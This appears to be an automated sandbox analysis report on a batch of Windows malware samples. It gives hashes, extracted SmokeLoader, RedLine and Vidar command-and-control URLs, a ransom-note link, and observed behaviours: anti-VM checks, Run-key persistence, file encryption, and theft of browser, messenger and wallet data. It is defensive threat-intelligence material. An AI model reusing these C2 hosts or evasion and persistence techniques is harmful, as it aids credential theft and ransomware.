Overview
overview
10Static
static
8 (1).exe
windows10_x64
108 (10).exe
windows10_x64
108 (11).exe
windows10_x64
108 (12).exe
windows10_x64
108 (13).exe
windows10_x64
108 (14).exe
windows10_x64
108 (15).exe
windows10_x64
108 (16).exe
windows10_x64
108 (17).exe
windows10_x64
108 (18).exe
windows10_x64
108 (19).exe
windows10_x64
108 (2).exe
windows10_x64
108 (20).exe
windows10_x64
108 (21).exe
windows10_x64
8 (22).exe
windows10_x64
108 (23).exe
windows10_x64
108 (24).exe
windows10_x64
108 (25).exe
windows10_x64
8 (26).exe
windows10_x64
108 (27).exe
windows10_x64
108 (28).exe
windows10_x64
108 (29).exe
windows10_x64
108 (3).exe
windows10_x64
108 (30).exe
windows10_x64
108 (31).exe
windows10_x64
108 (4).exe
windows10_x64
108 (5).exe
windows10_x64
108 (6).exe
windows10_x64
108 (7).exe
windows10_x64
108 (8).exe
windows10_x64
108 (9).exe
windows10_x64
108.exe
windows10_x64
10Resubmissions
13-08-2021 10:16
210813-wpta271jdx 1008-08-2021 23:00
210808-fgs5g9pxfs 1007-08-2021 23:12
210807-g2jw1lmd4a 1007-08-2021 16:10
210807-51nhct4kfx 1006-08-2021 23:43
210806-gc2271nxwj 1006-08-2021 06:00
210806-f443x39x8a 1005-08-2021 17:08
210805-97y6banvvx 1004-08-2021 17:25
210804-hkxx2ntr8x 1004-08-2021 12:12
210804-rjbg4b4y7n 1003-08-2021 17:12
210803-r2h7ytjwqj 10Analysis
-
max time kernel
1801s -
max time network
1810s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
20-07-2021 09:44
Static task
static1
Behavioral task
behavioral1
Sample
8 (1).exe
Resource
win10v20210410
Behavioral task
behavioral2
Sample
8 (10).exe
Resource
win10v20210408
Behavioral task
behavioral3
Sample
8 (11).exe
Resource
win10v20210410
Behavioral task
behavioral4
Sample
8 (12).exe
Resource
win10v20210408
Behavioral task
behavioral5
Sample
8 (13).exe
Resource
win10v20210410
Behavioral task
behavioral6
Sample
8 (14).exe
Resource
win10v20210408
Behavioral task
behavioral7
Sample
8 (15).exe
Resource
win10v20210410
Behavioral task
behavioral8
Sample
8 (16).exe
Resource
win10v20210410
Behavioral task
behavioral9
Sample
8 (17).exe
Resource
win10v20210408
Behavioral task
behavioral10
Sample
8 (18).exe
Resource
win10v20210410
Behavioral task
behavioral11
Sample
8 (19).exe
Resource
win10v20210408
Behavioral task
behavioral12
Sample
8 (2).exe
Resource
win10v20210410
Behavioral task
behavioral13
Sample
8 (20).exe
Resource
win10v20210408
Behavioral task
behavioral14
Sample
8 (21).exe
Resource
win10v20210410
Behavioral task
behavioral15
Sample
8 (22).exe
Resource
win10v20210410
Behavioral task
behavioral16
Sample
8 (23).exe
Resource
win10v20210408
Behavioral task
behavioral17
Sample
8 (24).exe
Resource
win10v20210410
Behavioral task
behavioral18
Sample
8 (25).exe
Resource
win10v20210408
Behavioral task
behavioral19
Sample
8 (26).exe
Resource
win10v20210410
Behavioral task
behavioral20
Sample
8 (27).exe
Resource
win10v20210408
Behavioral task
behavioral21
Sample
8 (28).exe
Resource
win10v20210410
Behavioral task
behavioral22
Sample
8 (29).exe
Resource
win10v20210410
Behavioral task
behavioral23
Sample
8 (3).exe
Resource
win10v20210408
Behavioral task
behavioral24
Sample
8 (30).exe
Resource
win10v20210410
Behavioral task
behavioral25
Sample
8 (31).exe
Resource
win10v20210408
Behavioral task
behavioral26
Sample
8 (4).exe
Resource
win10v20210410
Behavioral task
behavioral27
Sample
8 (5).exe
Resource
win10v20210408
Behavioral task
behavioral28
Sample
8 (6).exe
Resource
win10v20210410
Behavioral task
behavioral29
Sample
8 (7).exe
Resource
win10v20210408
Behavioral task
behavioral30
Sample
8 (8).exe
Resource
win10v20210410
Behavioral task
behavioral31
Sample
8 (9).exe
Resource
win10v20210410
General
-
Target
8 (30).exe
-
Size
3.0MB
-
MD5
bb072cad921aa5ce8b97706ce01bc570
-
SHA1
18bf034906c1341b7817e7361ad27a4425d820bd
-
SHA256
817a50d00909383bbef41e6f4e61b527d55f0873bcf745b29dbba75f52fe2e97
-
SHA512
d40e5f77d882ed29bd9de5a6848072e2f81cd02176955e2b1a4aedcdf4eb687d77bebe33cef0c7d702bc828181755f86e2564523d476adbb785f396a5ce1d474
Malware Config
Extracted
C:\_readme.txt
https://we.tl/t-N3p42CffoV
Extracted
vidar
39.6
933
https://sslamlssa1.tumblr.com/
-
profile_id
933
Extracted
smokeloader
2020
http://conceitosseg.com/upload/
http://integrasidata.com/upload/
http://ozentekstil.com/upload/
http://finbelportal.com/upload/
http://telanganadigital.com/upload/
Extracted
redline
AniNEW
akedauiver.xyz:80
Extracted
redline
sel16
dwarimlari.xyz:80
Extracted
redline
sel17
dwarimlari.xyz:80
Extracted
redline
1
ynabrdosmc.xyz:80
Signatures
-
Process spawned unexpected child process 3 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1684 3444 rUNdlL32.eXe 96 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6056 3444 rUNdlL32.eXe 96 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4460 3444 rUNdlL32.eXe 96 -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 8 IoCs
resource yara_rule behavioral24/memory/4972-280-0x0000000000400000-0x000000000041E000-memory.dmp family_redline behavioral24/memory/4972-281-0x0000000000417E1A-mapping.dmp family_redline behavioral24/memory/3880-328-0x0000000000417E26-mapping.dmp family_redline behavioral24/memory/3880-327-0x0000000000400000-0x000000000041E000-memory.dmp family_redline behavioral24/memory/500-347-0x0000000000417DEA-mapping.dmp family_redline behavioral24/memory/500-346-0x0000000000400000-0x000000000041E000-memory.dmp family_redline behavioral24/memory/4384-355-0x0000000000D40000-0x0000000000D5B000-memory.dmp family_redline behavioral24/memory/4384-357-0x0000000002850000-0x0000000002869000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs
description pid Process procid_target PID 4260 created 4368 4260 WerFault.exe 103 PID 5708 created 7160 5708 WerFault.exe 212 -
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
description pid Process procid_target PID 3896 created 7076 3896 svchost.exe 210 PID 3896 created 6712 3896 svchost.exe 301 -
resource yara_rule behavioral24/memory/4972-280-0x0000000000400000-0x000000000041E000-memory.dmp Redline_stealer2 behavioral24/memory/4972-281-0x0000000000417E1A-mapping.dmp Redline_stealer2 behavioral24/memory/3880-328-0x0000000000417E26-mapping.dmp Redline_stealer2 behavioral24/memory/3880-327-0x0000000000400000-0x000000000041E000-memory.dmp Redline_stealer2 behavioral24/memory/500-347-0x0000000000417DEA-mapping.dmp Redline_stealer2 behavioral24/memory/500-346-0x0000000000400000-0x000000000041E000-memory.dmp Redline_stealer2 behavioral24/memory/4384-355-0x0000000000D40000-0x0000000000D5B000-memory.dmp Redline_stealer2 behavioral24/memory/4384-357-0x0000000002850000-0x0000000002869000-memory.dmp Redline_stealer2 -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 2 IoCs
resource yara_rule behavioral24/memory/1436-185-0x0000000000AE0000-0x0000000000B7D000-memory.dmp family_vidar behavioral24/memory/1436-186-0x0000000000400000-0x00000000008F2000-memory.dmp family_vidar -
resource yara_rule behavioral24/files/0x000100000001ab9b-120.dat aspack_v212_v242 behavioral24/files/0x000100000001ab9b-121.dat aspack_v212_v242 behavioral24/files/0x000100000001ab96-125.dat aspack_v212_v242 behavioral24/files/0x000100000001ab97-124.dat aspack_v212_v242 behavioral24/files/0x000100000001ab99-129.dat aspack_v212_v242 behavioral24/files/0x000100000001ab99-131.dat aspack_v212_v242 behavioral24/files/0x000100000001ab97-127.dat aspack_v212_v242 behavioral24/files/0x000100000001ab96-126.dat aspack_v212_v242 -
Downloads MZ/PE file
-
Executes dropped EXE 64 IoCs
pid Process 2836 setup_installer.exe 4032 setup_install.exe 2084 sonia_1.exe 1436 sonia_3.exe 3952 sonia_2.exe 1120 sonia_6.exe 2840 sonia_4.exe 3960 sonia_5.exe 4016 svchost.exe 3660 explorer.exe 4120 jhuuee.exe 4192 OLKbrowser.exe 4284 explorer.exe 4368 setup.exe 4444 jfiag3g_gg.exe 4584 winnetdriv.exe 4604 zhangd.exe 4756 jfiag3g_gg.exe 4812 Chrome Update.exe 5104 zhangd.exe 4972 OLKbrowser.exe 3568 Conhost.exe 4936 jSdaT5nE0b8JDQ5TWF1Gy4dL.exe 5060 jfiag3g_gg.exe 416 VkpE1gRngNXFU0Cn05vHerv0.exe 4164 Acre.exe.com 4480 Acre.exe.com 4616 ACiNVstKWjR5KeuROoPr2s5O.exe 3860 uPzycWHt5eiu5PHtDDY4fwTI.exe 4012 wa5IqaoARMeCfzk5EGmIb5Jc.exe 3880 jSdaT5nE0b8JDQ5TWF1Gy4dL.exe 4104 rJhZg0bwisK5bP7bLxUHp2lu.exe 4384 Updater.exe 3400 ACiNVstKWjR5KeuROoPr2s5O.exe 500 ACiNVstKWjR5KeuROoPr2s5O.exe 4676 jfiag3g_gg.exe 5144 7jiLTiYSFXtwlgQxL3sEkMT6.exe 5372 XC7GFZbOyXvcLg6m3jXQe4az.exe 5516 setup_installer.exe 5556 u23UoDWXrdQ41Fgmp4uqBhEf.exe 5648 XC7GFZbOyXvcLg6m3jXQe4az.exe 5712 setup_install.exe 5820 NIAOGBzy_hFz9YCFo91sc8Cw.exe 5988 karotima_1.exe 6024 karotima_2.exe 5136 6UnP7EhagycDLPoMKxBtGRuQ.exe 5188 karotima_2.exe 5148 kGPLQ7M8fqAHElYq3fSV5UnL.exe 2216 kGPLQ7M8fqAHElYq3fSV5UnL.exe 5960 bKfpc48xGw3Dw3RG2dKu5Vwk.exe 4464 5465436.exe 6104 szCedVVBNBra28ARc2qYEf08.exe 4476 U_4UFn8WiO3eu26sOYob2_Fx.exe 6180 11111.exe 6188 FSmhlU6Of5LeBRyI0j9T6fgM.exe 6196 pADyznAja7hNAcn0P3Ium4B3.exe 6232 bZzVstBGF42ordOVpwbQAw5J.exe 6276 NIAOGBzy_hFz9YCFo91sc8Cw.exe 6284 PHgFEn0n4RnF7W9nNSZBw4vt.exe 6304 dKY998s5SPzWwNMcYpaw6yUY.exe 6320 8397034.exe 6336 3380837.exe 6348 lhHmd78utKBh4mHCibwNzuCC.exe 6452 I8cHejqtMA89JGV5R5M7N7Kp.exe -
Modifies extensions of user files 7 IoCs
Ransomware generally changes the extension on encrypted files.
description ioc Process File renamed C:\Users\Admin\Pictures\ConvertFromGroup.raw => C:\Users\Admin\Pictures\ConvertFromGroup.raw.moqs 9E06.exe File renamed C:\Users\Admin\Pictures\NewMount.raw => C:\Users\Admin\Pictures\NewMount.raw.moqs 9E06.exe File opened for modification C:\Users\Admin\Pictures\OptimizeUse.tiff 9E06.exe File renamed C:\Users\Admin\Pictures\OptimizeUse.tiff => C:\Users\Admin\Pictures\OptimizeUse.tiff.moqs 9E06.exe File renamed C:\Users\Admin\Pictures\StepSet.raw => C:\Users\Admin\Pictures\StepSet.raw.moqs 9E06.exe File renamed C:\Users\Admin\Pictures\UnpublishInstall.png => C:\Users\Admin\Pictures\UnpublishInstall.png.moqs 9E06.exe File renamed C:\Users\Admin\Pictures\WaitProtect.crw => C:\Users\Admin\Pictures\WaitProtect.crw.moqs 9E06.exe -
resource yara_rule behavioral24/files/0x000100000001aba5-222.dat upx behavioral24/files/0x000100000001aba5-248.dat upx behavioral24/files/0x000100000001aba5-267.dat upx behavioral24/files/0x000100000001aba5-221.dat upx behavioral24/files/0x000300000001abbb-303.dat upx behavioral24/files/0x000300000001abbb-302.dat upx -
Checks BIOS information in registry 2 TTPs 10 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rJhZg0bwisK5bP7bLxUHp2lu.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rJhZg0bwisK5bP7bLxUHp2lu.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion I8cHejqtMA89JGV5R5M7N7Kp.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion U_4UFn8WiO3eu26sOYob2_Fx.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion oStteIIySaOnBQ3EkjOI_WM9.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion CF00.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion CF00.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion I8cHejqtMA89JGV5R5M7N7Kp.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion U_4UFn8WiO3eu26sOYob2_Fx.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion oStteIIySaOnBQ3EkjOI_WM9.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation build2.exe Key value queried \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation sonia_5.exe Key value queried \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation karotima_1.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\eRntMwARsh.url Acre.exe.com -
Loads dropped DLL 36 IoCs
pid Process 4032 setup_install.exe 4032 setup_install.exe 4032 setup_install.exe 4032 setup_install.exe 4032 setup_install.exe 3952 sonia_2.exe 3860 uPzycWHt5eiu5PHtDDY4fwTI.exe 1436 sonia_3.exe 1436 sonia_3.exe 5712 setup_install.exe 5712 setup_install.exe 5712 setup_install.exe 5712 setup_install.exe 5712 setup_install.exe 6076 9E06.exe 6572 setup_install.exe 6572 setup_install.exe 6572 setup_install.exe 6572 setup_install.exe 6572 setup_install.exe 2216 kGPLQ7M8fqAHElYq3fSV5UnL.exe 2216 kGPLQ7M8fqAHElYq3fSV5UnL.exe 6528 cmd.exe 1036 dKY998s5SPzWwNMcYpaw6yUY.exe 1036 dKY998s5SPzWwNMcYpaw6yUY.exe 7132 KaN4oxVdNgcWXHg7_Sl3FY8D.exe 7132 KaN4oxVdNgcWXHg7_Sl3FY8D.exe 6196 pADyznAja7hNAcn0P3Ium4B3.exe 6196 pADyznAja7hNAcn0P3Ium4B3.exe 6132 D880.exe 6132 D880.exe 6308 build2.exe 6308 build2.exe 208 huratfj 6120 huratfj 5228 huratfj -
Modifies file permissions 1 TTPs 1 IoCs
pid Process 5904 icacls.exe -
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.exe" sonia_6.exe Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\22319f0f-b268-4e77-a6c3-67b2eaa72a32\\9E06.exe\" --AutoStart" 9E06.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA rJhZg0bwisK5bP7bLxUHp2lu.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA U_4UFn8WiO3eu26sOYob2_Fx.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA I8cHejqtMA89JGV5R5M7N7Kp.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA oStteIIySaOnBQ3EkjOI_WM9.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA szCedVVBNBra28ARc2qYEf08.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA sH3EbgK9T6oeicNB0HXuc4vb.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA CF00.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 15 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 437 api.2ip.ua 491 api.2ip.ua 9 ip-api.com 129 ipinfo.io 343 api.2ip.ua 378 api.2ip.ua 458 api.2ip.ua 700 api.2ip.ua 13 ipinfo.io 342 api.2ip.ua 249 api.ipify.org 562 api.2ip.ua 621 api.2ip.ua 14 ipinfo.io 127 ipinfo.io -
Drops file in System32 directory 3 IoCs
description ioc Process File opened for modification C:\Windows\System32\Tasks\Time Trigger Task svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat svchost.exe File opened for modification C:\Windows\System32\Tasks\Firefox Default Browser Agent 36CE3052C12FA5DC svchost.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
pid Process 4104 rJhZg0bwisK5bP7bLxUHp2lu.exe 4476 U_4UFn8WiO3eu26sOYob2_Fx.exe 6452 I8cHejqtMA89JGV5R5M7N7Kp.exe 7024 oStteIIySaOnBQ3EkjOI_WM9.exe 6496 CF00.exe -
Suspicious use of SetThreadContext 29 IoCs
description pid Process procid_target PID 4092 set thread context of 4016 4092 svchost.exe 99 PID 4192 set thread context of 4972 4192 OLKbrowser.exe 109 PID 4936 set thread context of 3880 4936 jSdaT5nE0b8JDQ5TWF1Gy4dL.exe 125 PID 4616 set thread context of 500 4616 ACiNVstKWjR5KeuROoPr2s5O.exe 148 PID 3568 set thread context of 2216 3568 Conhost.exe 181 PID 5960 set thread context of 6216 5960 bKfpc48xGw3Dw3RG2dKu5Vwk.exe 188 PID 6232 set thread context of 7148 6232 bZzVstBGF42ordOVpwbQAw5J.exe 214 PID 6276 set thread context of 6684 6276 NIAOGBzy_hFz9YCFo91sc8Cw.exe 221 PID 6856 set thread context of 5864 6856 5Dy7hOwiTL8Ak6QWynvwphUL.exe 226 PID 5820 set thread context of 6276 5820 NIAOGBzy_hFz9YCFo91sc8Cw.exe 230 PID 6180 set thread context of 6312 6180 11111.exe 231 PID 6520 set thread context of 5624 6520 2YmVmtTLWyb91Qe2CZ7Y8yVY.exe 228 PID 6964 set thread context of 6652 6964 WerFault.exe 234 PID 6304 set thread context of 1036 6304 dKY998s5SPzWwNMcYpaw6yUY.exe 242 PID 6524 set thread context of 5064 6524 w4tIrKVX0vuANbyiyKLpSWZC.exe 246 PID 5224 set thread context of 2404 5224 jxRhkXsx2LCqJ11KLYQ57gus.exe 249 PID 7576 set thread context of 6156 7576 9E06.exe 296 PID 7484 set thread context of 5752 7484 1234.exe 299 PID 7616 set thread context of 6712 7616 1234.exe 301 PID 6092 set thread context of 6076 6092 9E06.exe 304 PID 4284 set thread context of 6308 4284 build2.exe 306 PID 4480 set thread context of 6728 4480 Acre.exe.com 319 PID 3496 set thread context of 6676 3496 Acre.exe.com 320 PID 7324 set thread context of 496 7324 9E06.exe 322 PID 5300 set thread context of 6952 5300 9E06.exe 326 PID 6180 set thread context of 4944 6180 9E06.exe 328 PID 5116 set thread context of 7572 5116 9E06.exe 335 PID 5568 set thread context of 5692 5568 9E06.exe 337 PID 7576 set thread context of 5164 7576 9E06.exe 346 -
Drops file in Program Files directory 12 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\EverestSoftrade\TonerRecover\adj.reg wa5IqaoARMeCfzk5EGmIb5Jc.exe File opened for modification C:\Program Files (x86)\EverestSoftrade\TonerRecover\adj2.reg wa5IqaoARMeCfzk5EGmIb5Jc.exe File opened for modification C:\Program Files (x86)\EverestSoftrade\TonerRecover\Updater.exe xqt8qLLHxSBbiug4VkrmvTGt.exe File opened for modification C:\Program Files (x86)\EverestSoftrade\TonerRecover\adj.reg xqt8qLLHxSBbiug4VkrmvTGt.exe File opened for modification C:\Program Files (x86)\EverestSoftrade\TonerRecover\adj2.reg xqt8qLLHxSBbiug4VkrmvTGt.exe File opened for modification C:\Program Files (x86)\EverestSoftrade\TonerRecover\Toner-Recover.exe wa5IqaoARMeCfzk5EGmIb5Jc.exe File opened for modification C:\Program Files (x86)\EverestSoftrade\TonerRecover\log.bat wa5IqaoARMeCfzk5EGmIb5Jc.exe File opened for modification C:\Program Files (x86)\EverestSoftrade\TonerRecover\Updater.exe wa5IqaoARMeCfzk5EGmIb5Jc.exe File opened for modification C:\Program Files (x86)\EverestSoftrade\TonerRecover\Uninstall.exe wa5IqaoARMeCfzk5EGmIb5Jc.exe File created C:\Program Files (x86)\EverestSoftrade\TonerRecover\Uninstall.ini wa5IqaoARMeCfzk5EGmIb5Jc.exe File opened for modification C:\Program Files (x86)\EverestSoftrade\TonerRecover\Toner-Recover.exe xqt8qLLHxSBbiug4VkrmvTGt.exe File opened for modification C:\Program Files (x86)\EverestSoftrade\TonerRecover\log.bat xqt8qLLHxSBbiug4VkrmvTGt.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp WerFault.exe File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File created C:\Windows\winnetdriv.exe explorer.exe File opened for modification C:\Windows\winnetdriv.exe explorer.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 17 IoCs
pid pid_target Process procid_target 4252 4812 WerFault.exe 108 4740 4368 WerFault.exe 103 2288 4368 WerFault.exe 103 4412 4368 WerFault.exe 103 4300 4368 WerFault.exe 103 4272 4368 WerFault.exe 103 4260 4368 WerFault.exe 103 4724 6188 WerFault.exe 187 6184 6188 WerFault.exe 187 6964 7160 WerFault.exe 212 7012 6188 WerFault.exe 187 6008 7160 WerFault.exe 212 3956 7160 WerFault.exe 212 804 6188 WerFault.exe 187 6360 7076 WerFault.exe 210 6532 7160 WerFault.exe 212 5708 7160 WerFault.exe 212 -
Checks SCSI registry key(s) 3 TTPs 12 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI sonia_2.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI huratfj Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI huratfj Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI huratfj Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI huratfj Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI sonia_2.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI sonia_2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI huratfj Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI huratfj Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI huratfj Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI huratfj Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI huratfj -
Checks processor information in registry 2 TTPs 18 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz svchost.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 sonia_3.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 dKY998s5SPzWwNMcYpaw6yUY.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 KaN4oxVdNgcWXHg7_Sl3FY8D.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 ies6fl_0TmfCmYRE5wqrEm57.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString ies6fl_0TmfCmYRE5wqrEm57.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString D880.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString build2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString kGPLQ7M8fqAHElYq3fSV5UnL.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString dKY998s5SPzWwNMcYpaw6yUY.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 pADyznAja7hNAcn0P3Ium4B3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString pADyznAja7hNAcn0P3Ium4B3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString sonia_3.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 kGPLQ7M8fqAHElYq3fSV5UnL.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString KaN4oxVdNgcWXHg7_Sl3FY8D.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 D880.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 build2.exe -
Delays execution with timeout.exe 7 IoCs
pid Process 7260 timeout.exe 7460 timeout.exe 4628 timeout.exe 6516 timeout.exe 3516 timeout.exe 7828 timeout.exe 7960 timeout.exe -
Kills process with taskkill 7 IoCs
pid Process 8060 taskkill.exe 5240 taskkill.exe 7360 taskkill.exe 4272 taskkill.exe 1256 taskkill.exe 7392 taskkill.exe 7400 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-434 = "Georgian Daylight Time" 0IzhjBLGzhfJ1lBcluP4OBHg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs 0IzhjBLGzhfJ1lBcluP4OBHg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates L_qUXI6RtLVPIQVw95aSnM00.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-662 = "Cen. Australia Standard Time" L_qUXI6RtLVPIQVw95aSnM00.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2041 = "Eastern Daylight Time (Mexico)" 0IzhjBLGzhfJ1lBcluP4OBHg.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-191 = "Mountain Daylight Time" 0IzhjBLGzhfJ1lBcluP4OBHg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed L_qUXI6RtLVPIQVw95aSnM00.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-682 = "E. Australia Standard Time" 0IzhjBLGzhfJ1lBcluP4OBHg.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2062 = "North Korea Standard Time" L_qUXI6RtLVPIQVw95aSnM00.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2572 = "Turks and Caicos Standard Time" L_qUXI6RtLVPIQVw95aSnM00.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft 